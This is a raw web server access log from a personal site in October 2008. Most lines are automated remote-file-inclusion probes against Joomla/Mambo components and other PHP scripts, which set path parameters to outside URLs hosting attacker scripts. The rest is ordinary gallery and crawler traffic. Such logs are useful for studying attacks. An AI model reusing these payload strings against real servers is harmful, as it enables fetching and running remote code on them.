67.77.184.232 - - [26/Oct/2008:09:58:49 -0700] "GET /logs/access_080216.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:09:58:50 -0700] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:58:50 -0700] "GET /SQuery/lib/gore.php?libpath=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:58:51 -0700] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [26/Oct/2008:09:58:56 -0700] "GET /logs/access_080530.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:59:00 -0700] "GET /logs/access_080727.log/home.php?pagina=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:59:09 -0700] "GET /logs/access_080712.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:59:09 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:59:09 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [26/Oct/2008:09:59:14 -0700] "GET /logs/access_080216.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [26/Oct/2008:09:59:19 -0700] "GET /logs/access_080216.log//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:59:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-024_3.jpg HTTP/1.1" 200 357855 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:59:22 -0700] "GET /logs/access_080216.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:09:59:24 -0700] "GET /logs/access_080216.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:09:59:29 -0700] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:59:30 -0700] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:59:53 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [26/Oct/2008:09:59:53 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:59:56 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0108.jpg HTTP/1.1" 200 370655 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:04 -0700] "GET /logs/access_080130.log//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:00:05 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:06 -0700] "GET /logs//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:00:06 -0700] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.30.20.130 - - [26/Oct/2008:10:00:07 -0700] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:07 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:00:07 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.30.20.130 - - [26/Oct/2008:10:00:10 -0700] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:00:14 -0700] "GET /logs/access_080130.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:15 -0700] "GET /administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:16 -0700] "GET /logs//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:00:20 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:00:20 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:22 -0700] "GET /logs/access_080130.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:23 -0700] "GET /administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:24 -0700] "GET /logs//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:27 -0700] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:27 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:00:27 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:28 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.223.158 - - [26/Oct/2008:10:00:32 -0700] "GET /logs/access_080218.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:00:34 -0700] "GET /logs//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 70881 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:00:37 -0700] "GET /logs/access_081007.log/browse.php/id=0/browse.php/header.php?prefix=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:00:37 -0700] "GET /browse.php/id=0/browse.php/header.php?prefix=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:00:37 -0700] "GET /logs/browse.php/id=0/browse.php/header.php?prefix=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.223.158 - - [26/Oct/2008:10:00:40 -0700] "GET /?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 8097 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:00:41 -0700] "GET /logs/access_080130.log//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:42 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:00:43 -0700] "GET /logs//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:00:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-008_2.jpg HTTP/1.0" 200 345829 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
203.146.102.38 - - [26/Oct/2008:10:01:00 -0700] "GET /logs/access_071222.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.77.184.232 - - [26/Oct/2008:10:01:05 -0700] "GET /logs/access_080216.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:10:01:05 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:01:06 -0700] "GET /logs/access_080216.log//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:01:08 -0700] "GET /logs/access_080216.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:01:10 -0700] "GET /logs/access_080530.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:01:15 -0700] "GET /blog/?show=slide&pageid=169&nggpage=3 HTTP/1.1" 200 157952 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.31 - - [26/Oct/2008:10:01:16 -0700] "GET /bikes/WeSTOC08/?N=A HTTP/1.1" 200 848 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:01:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-083_1.jpg HTTP/1.1" 200 377578 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
202.142.223.158 - - [26/Oct/2008:10:01:30 -0700] "GET /logs/access_080303.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:01:30 -0700] "GET /logs/access_080216.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:01:42 -0700] "GET /logs/access_080530.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:01:42 -0700] "GET /logs/access_080216.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:01:49 -0700] "GET /logs/access_080907.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:01:50 -0700] "GET /?S=D&show=slide&pageid=17&nggpage=3 HTTP/1.1" 200 146817 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
77.232.68.10 - - [26/Oct/2008:10:01:55 -0700] "GET /errors.php?error=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:02:02 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0069.jpg HTTP/1.1" 200 376553 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:02:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-005_4.jpg HTTP/1.1" 200 348731 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:02:05 -0700] "GET /logs/access_080216.log//administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:02:28 -0700] "GET /logs/index2.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:02:28 -0700] "GET /index2.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:02:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-174_0.jpg HTTP/1.1" 200 275766 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
65.55.108.194 - - [26/Oct/2008:10:02:36 -0700] "GET /?show=slide&pageid=163&nggpage=18 HTTP/1.1" 200 145818 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.22.187 - - [26/Oct/2008:10:02:39 -0700] "GET /bikes/dteel/2008_07_03/?D=D HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:03:10 -0700] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:03:11 -0700] "GET /logs/access_081008.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:10:03:15 -0700] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:10:03:18 -0700] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:03:19 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0074.jpg HTTP/1.1" 200 466874 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.32.215.50 - - [26/Oct/2008:10:03:24 -0700] "GET /logs/access_081008.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [26/Oct/2008:10:03:34 -0700] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:03:36 -0700] "GET /logs/access_080529.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:03:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-199.jpg HTTP/1.1" 200 422519 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
65.55.109.74 - - [26/Oct/2008:10:04:01 -0700] "GET /?S=D&show=slide&pageid=17&nggpage=3 HTTP/1.0" 200 146763 "http://search.live.com/results.aspx?q=allan" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.55.109.74 - - [26/Oct/2008:10:04:01 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:04:01 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:04:02 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.74 - - [26/Oct/2008:10:04:02 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.74 - - [26/Oct/2008:10:04:02 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:04:03 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:04:06 -0700] "GET /logs/access_080512.log//include/functions_common.php?gl_root_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:04:06 -0700] "GET /include/functions_common.php?gl_root_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.143.7 - - [26/Oct/2008:10:04:07 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.itpro-ua.com/dotproject//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.102.38 - - [26/Oct/2008:10:04:10 -0700] "GET /logs/access_071223.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:04:14 -0700] "GET /administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [26/Oct/2008:10:04:17 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [26/Oct/2008:10:04:19 -0700] "GET /administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=http://stalbert.org/images/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:04:23 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0132.jpg HTTP/1.1" 200 286102 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:04:27 -0700] "GET /logs/access_081008.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:04:30 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:04:30 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:04:33 -0700] "GET /logs/access_071222.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:04:43 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:04:43 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:04:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-146.jpg HTTP/1.1" 200 451211 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
59.126.46.141 - - [26/Oct/2008:10:04:53 -0700] "GET /logs//language.inc.php?langs_dir=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:04:53 -0700] "GET /logs/access_080820.log/browse.php/id=0/browse.php/header.php?prefix=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:04:59 -0700] "GET /language.inc.php?langs_dir=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:05:12 -0700] "GET /logs/access_080815.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:05:19 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
